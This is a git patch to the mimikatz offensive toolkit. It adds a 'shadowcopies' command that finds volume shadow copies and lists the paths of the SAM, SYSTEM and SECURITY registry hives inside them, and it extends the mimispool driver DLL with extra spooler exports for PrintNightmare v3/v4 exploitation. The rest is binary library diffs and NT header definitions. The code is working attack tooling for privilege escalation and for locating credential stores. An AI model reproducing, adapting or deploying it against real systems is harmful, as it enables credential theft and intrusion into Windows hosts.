From ba3c2c66f6c799bd1317b64075056304180cb501 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Wed, 21 Jul 2021 23:50:54 +0200 Subject: [PATCH] [new] mimikatz misc::shadowcopies (to display some properties without admin rights) [new] mimikatz mimispool module includes some functions for printnigtmare v3/v4 (must be recompiled after adjust) [internal] new ntdll.min.lib to call NtOpenDirectoryObject/NtQueryDirectoryObject --- lib/Win32/ntdll.min.lib | Bin 11542 -> 12044 bytes lib/x64/ntdll.min.lib | Bin 10838 -> 11300 bytes mimikatz/modules/kuhl_m_misc.c | 83 +++++++++++++++++++++++++++++++++ mimikatz/modules/kuhl_m_misc.h | 1 + mimispool/mimispool.c | 20 +++++--- mimispool/mimispool.def | 5 +- mimispool/mimispool.h | 5 +- modules/kull_m_process.h | 70 +++++++++++++++++++++++++++ modules/kull_m_string.c | 16 +++++++ modules/kull_m_string.h | 1 + 10 files changed, 193 insertions(+), 8 deletions(-) diff --git a/lib/Win32/ntdll.min.lib b/lib/Win32/ntdll.min.lib index 79c592d5e2dfca03bcd4f3834dd10e44a74379b1..fce1d30949058147b0c79ad9670004a47eac7b44 100644 GIT binary patch literal 12044 zcmcIq%}*Rh7JuN~^_q|@u^k*^0|N#F2D308#zb1}jss+kLIxIwI5#|I8Z!>_u{}NB zwJ$5>lmpUUa*Co{Hh)15*(j$Ra)^{jIqYQ>S;{TPoN|aFZL+_buC9;ns-Ec#Zs}3o z^Fi4j>CE!7UcbOU(_s3qcl(Iw4$*}y(Zx52 zhK`9YeeKimM?{Q9=6xD{hltTw-KSJP5u>qheHt$iwdgaHpeyLJMIWLBO}y{ZLI5mC_z)7aN0l#ni=BsHcHU+oKG`9;Tv@Aflsra6ET|0arzh~==wCL4^V>U z2RR+11Wmu^(*)+pXmY@(YZwco*=?Uj(T-8-d!I($#kzn}kA1p)o2W%!q67_N9K*T2 zz4h0&Hn$6Vt7|(e+v{6}&F#IaS2{YPy}kVI#zvG)|7h`jZsGQB{?)zJTZLP+m-kj` zm3q;23bi+#Y9qIpMjz!$9UU1sdG9Yx$9=S3J*c^rqF1g}x7^yk(`e+<3$k6D4DVs{ z-UDafi?&kgx#Z5HhUZii#N1*w1Z5VpmI-jf)4dpSs~xDIB$+i={%Azn+ljL;by7xk;Pzg72( z4M!V+J_ox9+OPe!Sv)e$Jj@7WV}M#sqI|S`#dRFH;yIx&Mi#HsI|?_6aCxgur^06w zZlQ4?{b$EpX}Ydc^|qXQId!cg9A7%`z3#XT9O`_tau09%Dx;B6fVJISUwy@`1p`yn zBFcjNdbR8sR7kJpa{4-`T{H0r7p=CN)m4Y-dxYs5wpbCLxmIo4-Xenb{><2Vu*v7t zAxBw|*M?cBDQYB*aa%DaP*={$%3;yf)X>Ncx8j?kM1qc9ZXO&sZtjNK+`vN%rZzq}Z-C43Tcr{kb6^?oXuEC`@Y`nFwKWQ8x8qv%VcD%!D>&+}7mu3G+TWu$tA7((B$d0; zA`$om;>xth#g0q4xZ2Cbj7hF;8=<_nR>d{$;@&aOzk#KadeyOb-rK~jxLS7M#MInJ z+-p%gvhn%6!%fq|O4tRGd*qA4Bfk!pJbQuYjf+Ib@O{6&MD)=xeAN-6cSecoV?_Na zqHj?a#)&=yWv>u@2zq~l=&ebjA3=v#iJpKynIhT%4b2d}4Vr^L{1eIt*N8r!CCbea zeGHlg@CTql_`t`Y_aHZq{sz$36Uc5ub`bdA1N&W!k5%epXr8&Az zzoy^N3{BB#Iz!iJntn@t^bGaWv-BKYq2JL24bby+md?=&be>+MaT=rxbdiQ=lCIJv zx=h0~LZg(TG3ue-r_%2!vqyabie=XecT~EKx=0A4k_@R$qaFe2y-68auNnAO!&=xACB0AHCAskkdc?-s2N*VY(Xq?H^NoK6UlVb5^PskaJpX9}c{zgM6 z+S<*b5DAC!Izv0JinoXLX%n_R#@8tHwiQ9{&YiiYhBrzU8P+>J(5G}TS1R;`a& zIGk7pn^~33>ko}lh!C)wSXIPgXoW~LJQgf%@DZac#Z0Ex%vB6l2JoS$^_V}q9Hc|7SoV_1s}X*8p8TL z;hpbfM-k&;l`TJ7Bwn+d8D-7 zZ97>{#Pzn{dXlc@Qt;DWiv6O;j^suUvs3=T={H8Y0z)3`4)y)!BHy|Y8dKaJMEQvE zI&)U#5E7rcrL1`j6Bt9UKL(2jEJ4Lvhx1;#X~sl?1jej2Z<|*wpeXT7vzEO@dIs7q zQ5Anwan&WTczd7F=fJ&-l3Ec&ZDuti@s=4T;QPYnCFe zG6ZSeAjfDH%Sf_(RPft#7`f}cjjAbv_s18IluE2k|^dG$lN`K(tt0X6;`H5N-cO zAz>5iaGbRt%D%`kBPk>SlH4ncv$7Wz zJT)&R;lx{~vx_+!LkgO{pqZz%o|iacB!4ERm3%$3L6RkOkFZ}uF9&$>|8dX-dfaXf zE9h#bPr`|}PIoiLFBp+%rtG1BO1{Dw3n~jkM>(pNlI#L&DMnvY3YM;~%iZX!Wp*q! z8w(K4|NYU;JY!JDC8{YQ+YM^WEpmmUTC==Q33o!`np4N!;KtbYNsb%IM|Xi2=kZuFcn50 zWP_~_eej{;=no1LHyMmFlntZ|L0Xt&Z(`T>S%iZ2Mbr-Q!3U?`b53YZ!Z7gZDV*=` z|L@$T*_CtGlKzR~^+x^ZMB_N0j>oQ!AFDSU`I`$6(Hlgu5>etLQF4LE*i@Jghy+$c zk-AAFurDdnF(QGzuW)9GB(QftW~#|LPLRE$aIY>Axgh6hauKIsPmzB_B$>ephI37p zae_i!G15yUna2r=JBrdYk>nvxP#$k`4=0!%b%-P@I6+}mkwv8f*HDZgAwluHA_Y4^ z`l-UYjn07dqQaa+$0j+HoL>9=P~C5gsU{!%J<>UbV+Ug>6LO6aolFodB#AbW!UL12 zVG-R-5nZw|q%_e!&RL|e38pec>)=k7Xvrn=pidXU9(a@|ngO|CqGeDo5cQ4_&4ZmH z(R7JkrH7dMI3nKz&M46eScR|whXx$(L3|!!2MIhy@Y_gc5$7Zl!_tt4%KRjFs^<`O zHUIx~?SAMz55Ll7@$+3FzS7mlKMzLuCx3YPuy^g-!B0GGt61=FpKF|jJ@xXfq{;h+ z$@k+Q`ovb6H+aD``6VOBXA-q;^Ty}AnE0j5JjNd=|R~BG?%*ha=O;$A1jT++of}`#+YwF>%&bW5Jm5TFM&3o(vruA~h z<~_&m&>&SAL!|15W=gxSRZH>?OGyFV$UN7&LziWRqRV~Af2@0mr?XmxBLBB?%C`ei zkZ)xtbo)5}l~vbx4;117x8Azu)2^DLcw~pg6o2i`@E>_glZXoS?ECp&SIfRLfiPdr zbtLdO7m=%iw?hLW$eCz@eff?mppsn>szH7;ucg^JqzFIG|KE_Je4?NYNtpj*sa3%T zfQHbeyZt8W4DgSIfmW?T7#dbWd`&0@;Sq0)zq7Q4U?eh6F_Ji6AMOZ*GUUWW841|G z?M?Ddp`%tkND`tkUyP5AYC%|Z{f80dssdLARH<-|`-_@N-wqRksqheADQdA8t0h}6 zR?8Bt|7^(QKXo5+!^cXh_xO5IieE2j4^8w$uPKc<3*jW+9Sv|br!}uFmMvoKBi2S) z%U4JaHr?Sb%59r2AEL}wJj9Ifu{_C4#)cgAI!gd I;X)PAf1ls!W&i*H diff --git a/lib/x64/ntdll.min.lib b/lib/x64/ntdll.min.lib index 8ebb06ef46d2e8b819bee6888f168282ce47aba7..626afbe1c5667f8ef8953e80dabecbae79d299da 100644 GIT binary patch literal 11300 zcmcIp&2Jn<7JqSIlb8Tr5<=|wWBe7{353MV42cwF9c%*@VQlPi!p$Cg+R1>Y$Mp1g zlU(+O5L#)k91xe45XwKWSHyt>AhgmRk%ELGj)((?71E0RRabRYS9Nu}$K#CjrmE|` zs$W(0t5@&69==-fHt$^PemSTAE)}PXS1wNHujKXii{f#*cyXFn*Sm@67SYLvL@%Iv zI#1O5F{d*(i30itC1_xb)8MZ}j0Qg8G_*k!(Dx`oxvPR6pacz%a2h#E6wo7-pwV{) zeT5P!X!3VXQ!Y_JKcNJjD+&4}qrOw| zoO0uR$8Dm2t-iBnwwC;NT8?*b!QExJzDR(`hRCB);gmxbdE|>C4drY0)Mm zR_--@ryfDjh2!j!zvB4u=5PU4X31Z6nytEH&R%cD$gSp%<5o>Eqq*dl9j{(1?n=2RnXLLy=POi*V*e!1n&IZPjQj@+~a zKJPj2ruVe*(UY%$t(dJ)ZI96oNo`W)hD`;MMOgoxhz`%*sdx%3&NAiAjn;YyroB(O zp>#*?q@{aQ4kIyTg7x-bh@m~V8s7UWJC#jmrFK7JUDAXwMmWH0t*tF5vRtDblI*o} zFjF?hf%L-8ZvJ|;%H|eYo?B`&tz6!#nA$7O)$WgZcemy>+&Yfk&B}JmnZGMA_mYa- zCMjdcOT{9SijZX%xQi3Vm;I9^O8&fytIdPW=C`6b$7Wv&k}tHx{v2;6GWebexD?Ar-*(6mCg}; z4Jw`|`U3Pb+Mm*`3Q6HUCEf9P$4`=Sy&G-lD1Dm}j75cKwI?Yy1cn7%>+xbS^C* ziH9(NkX#*LZ|4#A&-4*l(|-Lt^o<*FtLtVOcJ$2TuR$)8`vtj}f5aNJtC%1acVPCo zy)wB|7ke6tROyrJ?NJZu#2hj~iI3;=bV`gJdi3qeD#RhB` zl5pHu$jKSd7}KaIMxtp^A}KMV6f(?=YEO(HV;-aIV>djK9gPh2M%|c5o)PhB?G~py zZkA*Z!#Jt-tX{Z19E=5ca^Q&3(%KSMYBgZ0hE29>Q%#7+ zGKO5j)TyDP{Wvok9wp?vf-KktWXgo&d1;TVX8v+Pu#g38~+2T{&Y&ubTI)rwzX*+~9lZtJ(8AI0-wlrwbkOCg7BBL8)x z_#Y^gW34lk`?3pV4}3=UJ0=%3K__~Spyl5|JHeAA+WO_Ww`-eTquJQLA9`Uc+c|3MkjhzJ~J$2VquiqzTOfPq+2dDqlQf9FGn<_E6|XCVM=_e zb`7aU7Qm_z4S6MGF%9`=_#jHAA#B_Oe)C!0DB>vWazb*s?LE6Jg1DSIRX+eAZO>9p zRY7b|a4OlUivDJ3COlR7u$`UW|AY^sWO4_*w^{ZTv1(FozTI8T7lk5XS1CA})eo7y zLdc2V6R{{xj!&|dQRj=V+L2xc&Y=J)gL^1JsqHgY2-U|}X%6@-2DXQu3Q*QEuD9@t zeZ2_!VI&!z)sK}h`&ePZyF_{dcoH$_j^4iZ zgr5wJw}-R|vLO=39>ps(Rm-@(VuIEnm4p1t9=Pz%_rKyo=tLMR9tHAI6FKruBam&M zku+;?EWp$wm=0DKUVz5xkU~Q?i|wn7XJS#&{!xo5TJ%&pYG>~<#TFdbaS!TECRkf` zbv(@x_3xExQ`^^?D|SoAuK#BOtXQ1+n9!aDnk9Jc0IiU)Hl%mqQE{}yh`0mX;wAf@ zB9)BXF2_v?vpYbRuBmY{k(5SGIY2gIcLgSE8Lev};XE?;{e-|W^8pe=8M*^NJIT>v zIff3DED`^|s*N}vJm!0l29M8yEsl~}!#(hk) zVf_LtB@ZUy+TYcD${QR|$SS$k0aluyKPa(c8M_V;(|qnBju=S;Dj-?Q`2Gqhx|vfr z2d0~agjiw(x;ZTHY#&_Yy4toXX^0~dF`fhM05K&-8|8=zdDX{*IVLe}x!V0>rrGOp zj%nn7_m7q4qn+hgnvQBYWd+-|EloQg69PAya1Or4b%K`?MNC@oME1J_#A3pUd=V#d MDiJZ7Qdi*r2WXPQ>i_@% delta 2123 zcmaKsU1(cn7{{NrS(`RlllGkE-Krxy-87|v-sKVafVgb7`e!6x%U zGVkiVDSdXQD+3i~nJDx^=#_WER>s`Lm|bC4f+C2FT}&9k|9jrJb8?gwetihf$NRj` z|9Q_>uisf*)kmtcwR-KDYJG;=W~g(pTCXOozqdz;=v5-+0Z~XL(iVuq>k@s1$l@_9 zFi%LLDI$S+T@t;7-ynuk7EM^et|Y!lBuLCjlARDyQgE@yLs*b%NYe8}g48WZW{t?A z3k%ZMB-u8R#a&pCFZZ|t3kqtF3$TJmlDGDsBC^7XLiRKazFiCU~JOm90G@mBA1-q6Z>Vj+d-Odu-1?4=^ zl{~#bYJunicmz)EC)xpF1m8r_t0=mVBiaJH2GK?Yg<-3(UNnWpArF=Kv~P)wUfuH}mSaXa&O3 zAV&An+2iNl=bw#?9Ve=P6H}}*kc2$kiOl!A??t4$2=`vN6RbsJb_lxAcquAlAUO^3 znW(!HT+KQHYSJ+O8l7_G&-7Y=@{s9RY|i$(I~;*K=4#>Pk{kp!kw*F1c+E~1Um#x1 z$>XujvomwvJ7el`;apW@%gpSt`ScZ!Nn3>sTbW0>J5gE4MpBX*UwoNN%= zP62Ku57{oO!R@4M0Gm!h{yphza5Yu*i{f~CG!7Lx;Zb=xWjabYLncH>#jA2R=?rnJ zr0{{XTcwq>s*02F)<{K}SI#aUK6CD!Wez6Oj?+Y`uMH`90-=)}$W;6MA$DFU#GQ=u zLT*Jg{-e+TV_psmp9Bi?YuTsO*7>Kbqc-Mj%}UJK5QCUf;=Gh|DDj_tF!|e@qXIj3 zDZ+Z*y-Rph)+&of73I(J&R2}itvwK($FK+Y$3p#kz?DK#5hKQTlHzj2N7^4&`F_D! z2T@iX5tTq4e?aHI3jK1*2=Vljh%kptoHWYonejd)?5Gr?4h8-{s$Z`(PZymN5qe|8 zty_x?&+z9($2WqVdSzKDIrYLct(%CKnL`IBhc#|yqjrztdH+&UtgmdD10}eJC)g;D F{sW$n-T(jq diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index c5df894..12477fb 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c @@ -30,6 +30,7 @@ const KUHL_M_C kuhl_m_c_misc[] = { {kuhl_m_misc_spooler, L"spooler", NULL}, {kuhl_m_misc_printnightmare, L"printnightmare", NULL}, {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, + {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL}, }; const KUHL_M kuhl_m_misc = { L"misc", L"Miscellaneous module", NULL, @@ -1883,3 +1884,85 @@ NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]) return STATUS_SUCCESS; } + +DECLARE_CONST_UNICODE_STRING(usRootDevice, L"\\Device"); +DECLARE_CONST_UNICODE_STRING(usDevice, L"Device"); +const OBJECT_ATTRIBUTES oaDevice = RTL_CONSTANT_OBJECT_ATTRIBUTES(&usRootDevice, 0); +const wchar_t *INT_FILES[] = {L"SYSTEM", L"SAM", L"SECURITY", L"SOFTWARE"}; +NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]) +{ + NTSTATUS status; + HANDLE hDeviceDirectory; + BYTE Buffer[0x100]; + ULONG Start, Context, ReturnLength, i, j; + BOOLEAN RestartScan; + POBJECT_DIRECTORY_INFORMATION pDirectoryInformation; + PWSTR szName, szShadowName, szFullPath; + WIN32_FILE_ATTRIBUTE_DATA Attribute; + + status = NtOpenDirectoryObject(&hDeviceDirectory, DIRECTORY_QUERY | DIRECTORY_TRAVERSE, (POBJECT_ATTRIBUTES) &oaDevice); + if(NT_SUCCESS(status)) + { + for(Start = 0, Context = 0, RestartScan = TRUE, status = STATUS_MORE_ENTRIES; status == STATUS_MORE_ENTRIES; ) + { + status = NtQueryDirectoryObject(hDeviceDirectory, Buffer, sizeof(Buffer), FALSE, RestartScan, &Context, &ReturnLength); + if(NT_SUCCESS(status)) + { + pDirectoryInformation = (POBJECT_DIRECTORY_INFORMATION) Buffer; + for(i = 0; i < (Context - Start); i++) + { + if(RtlEqualUnicodeString(&usDevice, &pDirectoryInformation[i].TypeName, TRUE)) + { + szName = kull_m_string_unicode_to_string(&pDirectoryInformation[i].Name); + if(szName) + { + if(szName == wcsstr(szName, L"HarddiskVolumeShadowCopy")) + { + if(kull_m_string_sprintf(&szShadowName, L"\\\\?\\GLOBALROOT\\Device\\%s\\", szName)) + { + kprintf(L"\nShadowCopy Volume : %s\n", szName); + kprintf(L"| Path : %s\n", szShadowName); + + if(GetFileAttributesEx(szShadowName, GetFileExInfoStandard, &Attribute)) + { + kprintf(L"| Volume LastWrite: "); + kull_m_string_displayLocalFileTime(&Attribute.ftLastWriteTime); + kprintf(L"\n"); + } + else PRINT_ERROR_AUTO(L"GetFileAttributesEx"); + kprintf(L"\n"); + for(j = 0; j < ARRAYSIZE(INT_FILES); j++) + { + if(kull_m_string_sprintf(&szFullPath, L"%sWindows\\System32\\config\\%s", szShadowName, INT_FILES[j])) + { + kprintf(L"* %s\n", szFullPath); + + if(GetFileAttributesEx(szFullPath, GetFileExInfoStandard, &Attribute)) + { + kprintf(L" | LastWrite : "); + kull_m_string_displayLocalFileTime(&Attribute.ftLastWriteTime); + kprintf(L"\n"); + } + else PRINT_ERROR_AUTO(L"GetFileAttributesEx"); + + LocalFree(szFullPath); + } + } + LocalFree(szShadowName); + } + } + LocalFree(szName); + } + } + } + Start = Context; + RestartScan = FALSE; + } + else PRINT_ERROR(L"NtQueryDirectoryObject: 0x%08x\n", status); + } + CloseHandle(hDeviceDirectory); + } + else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status); + + return STATUS_SUCCESS; +} \ No newline at end of file diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h index 84be28a..4baa354 100644 --- a/mimikatz/modules/kuhl_m_misc.h +++ b/mimikatz/modules/kuhl_m_misc.h @@ -47,6 +47,7 @@ NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wchar_t * ar NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]); +NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]); BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary); BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding); diff --git a/mimispool/mimispool.c b/mimispool/mimispool.c index b233b86..e140c1a 100644 --- a/mimispool/mimispool.c +++ b/mimispool/mimispool.c @@ -14,7 +14,7 @@ BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserv case DLL_PROCESS_ATTACH: kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH"); ret = FALSE; - // FALSE avoid to keep library in memory + // FALSE avoid to keep library in memory (PrintNightmare < 3/4) // TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*) break; @@ -100,11 +100,7 @@ void kspool(LPCWSTR szFrom) if(kspool_logfile = _wfopen(L"mimispool.log", L"a")) #pragma warning(pop) { - if(GetUserName(Buffer, &cbBuffer)) - { - klog(kspool_logfile, L"[" PLATFORM L"] [%s] I\'m running with \'%s\' (and I like it :)\n", szFrom, Buffer); - } - + klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-"); fclose(kspool_logfile); } } @@ -119,4 +115,16 @@ void klog(FILE * logfile, PCWCHAR format, ...) va_end(args); fflush(logfile); } +} + +DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags) +{ + kspool(TEXT(__FUNCTION__)); + return ERROR_SUCCESS; +} + +BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent) +{ + kspool(TEXT(__FUNCTION__)); + return TRUE; } \ No newline at end of file diff --git a/mimispool/mimispool.def b/mimispool/mimispool.def index 2f4b69f..8b85595 100644 --- a/mimispool/mimispool.def +++ b/mimispool/mimispool.def @@ -4,4 +4,7 @@ EXPORTS DrvEnableDriver DrvDisableDriver - DrvResetConfigCache \ No newline at end of file + DrvResetConfigCache + + GenerateCopyFilePaths + SpoolerCopyFileEvent \ No newline at end of file diff --git a/mimispool/mimispool.h b/mimispool/mimispool.h index 6c17c71..2fb66cb 100644 --- a/mimispool/mimispool.h +++ b/mimispool/mimispool.h @@ -33,4 +33,7 @@ __control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVe VOID APIENTRY DrvDisableDriver(); void kspool(LPCWSTR szFrom); -void klog(FILE * logfile, PCWCHAR format, ...); \ No newline at end of file +void klog(FILE * logfile, PCWCHAR format, ...); + +DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags); +BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent); \ No newline at end of file diff --git a/modules/kull_m_process.h b/modules/kull_m_process.h index fadf075..aa6ca9d 100644 --- a/modules/kull_m_process.h +++ b/modules/kull_m_process.h @@ -373,6 +373,74 @@ typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION { //ULONGLONG Spare1; } SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION; +#define OBJ_INHERIT 0x00000002L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +typedef struct _OBJECT_ATTRIBUTES64 { + ULONG Length; + ULONG64 RootDirectory; + ULONG64 ObjectName; + ULONG Attributes; + ULONG64 SecurityDescriptor; + ULONG64 SecurityQualityOfService; +} OBJECT_ATTRIBUTES64; +typedef OBJECT_ATTRIBUTES64 *POBJECT_ATTRIBUTES64; +typedef CONST OBJECT_ATTRIBUTES64 *PCOBJECT_ATTRIBUTES64; + +typedef struct _OBJECT_ATTRIBUTES32 { + ULONG Length; + ULONG RootDirectory; + ULONG ObjectName; + ULONG Attributes; + ULONG SecurityDescriptor; + ULONG SecurityQualityOfService; +} OBJECT_ATTRIBUTES32; +typedef OBJECT_ATTRIBUTES32 *POBJECT_ATTRIBUTES32; +typedef CONST OBJECT_ATTRIBUTES32 *PCOBJECT_ATTRIBUTES32; + +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR + PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE +} OBJECT_ATTRIBUTES; +typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; +typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES; + +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ + } + +#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \ + { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL } + +#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) + +#define DIRECTORY_QUERY 0x0001 +#define DIRECTORY_TRAVERSE 0x0002 +#define DIRECTORY_CREATE_OBJECT 0x0004 +#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 +#define DIRECTORY_ALL_ACCESS STANDARD_RIGHTS_REQUIRED | 0xF + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + extern NTSTATUS WINAPI NtQuerySystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT OPTIONAL PULONG ReturnLength); extern NTSTATUS WINAPI NtQuerySystemInformationEx(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID InputBuffer, ULONG InputBufferLength, PVOID SystemInformation, ULONG SystemInformationLength, ULONG *ReturnLength); extern NTSTATUS WINAPI NtSetSystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength); @@ -380,6 +448,8 @@ extern NTSTATUS WINAPI NtQueryInformationProcess(IN HANDLE ProcessHandle, IN PRO extern NTSTATUS WINAPI NtSuspendProcess(IN HANDLE ProcessHandle); extern NTSTATUS WINAPI NtResumeProcess(IN HANDLE ProcessHandle); extern NTSTATUS WINAPI NtTerminateProcess(IN OPTIONAL HANDLE ProcessHandle, IN NTSTATUS ExitStatus); +extern NTSTATUS WINAPI NtOpenDirectoryObject(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); +extern NTSTATUS WINAPI NtQueryDirectoryObject(IN HANDLE DirectoryHandle, OUT OPTIONAL PVOID Buffer, IN ULONG Length, IN BOOLEAN ReturnSingleEntry, IN BOOLEAN RestartScan, IN OUT PULONG Context, OUT OPTIONAL PULONG ReturnLength); typedef NTSTATUS (WINAPI * PNTQUERYSYSTEMINFORMATIONEX) (SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID InputBuffer, ULONG InputBufferLength, PVOID SystemInformation, ULONG SystemInformationLength, ULONG *ReturnLength); diff --git a/modules/kull_m_string.c b/modules/kull_m_string.c index 070779d..bf11ba0 100644 --- a/modules/kull_m_string.c +++ b/modules/kull_m_string.c @@ -358,6 +358,22 @@ BOOL kull_m_string_copyA(LPSTR *dst, LPCSTR src) return status; } +PWSTR kull_m_string_unicode_to_string(PCUNICODE_STRING src) +{ + PWSTR ret = NULL; + + if(src->Length && src->Buffer) + { + ret = (PWSTR) LocalAlloc(LPTR, src->Length + sizeof(wchar_t)); + if(ret) + { + RtlCopyMemory(ret, src->Buffer, src->Length); + } + } + + return ret; +} + BOOL kull_m_string_quickxml_simplefind(LPCWSTR xml, LPCWSTR node, LPWSTR *dst) { BOOL status = FALSE; diff --git a/modules/kull_m_string.h b/modules/kull_m_string.h index 5139d37..445e0ed 100644 --- a/modules/kull_m_string.h +++ b/modules/kull_m_string.h @@ -95,6 +95,7 @@ BOOL kull_m_string_copy_len(LPWSTR *dst, LPCWSTR src, size_t size); BOOL kull_m_string_copy(LPWSTR *dst, LPCWSTR src); BOOL kull_m_string_copyA_len(LPSTR *dst, LPCSTR src, size_t size); BOOL kull_m_string_copyA(LPSTR *dst, LPCSTR src); +PWSTR kull_m_string_unicode_to_string(PCUNICODE_STRING src); BOOL kull_m_string_quickxml_simplefind(LPCWSTR xml, LPCWSTR node, LPWSTR *dst); #if !defined(MIMIKATZ_W2000_SUPPORT) BOOL kull_m_string_quick_base64_to_Binary(PCWSTR base64, PBYTE *data, DWORD *szData);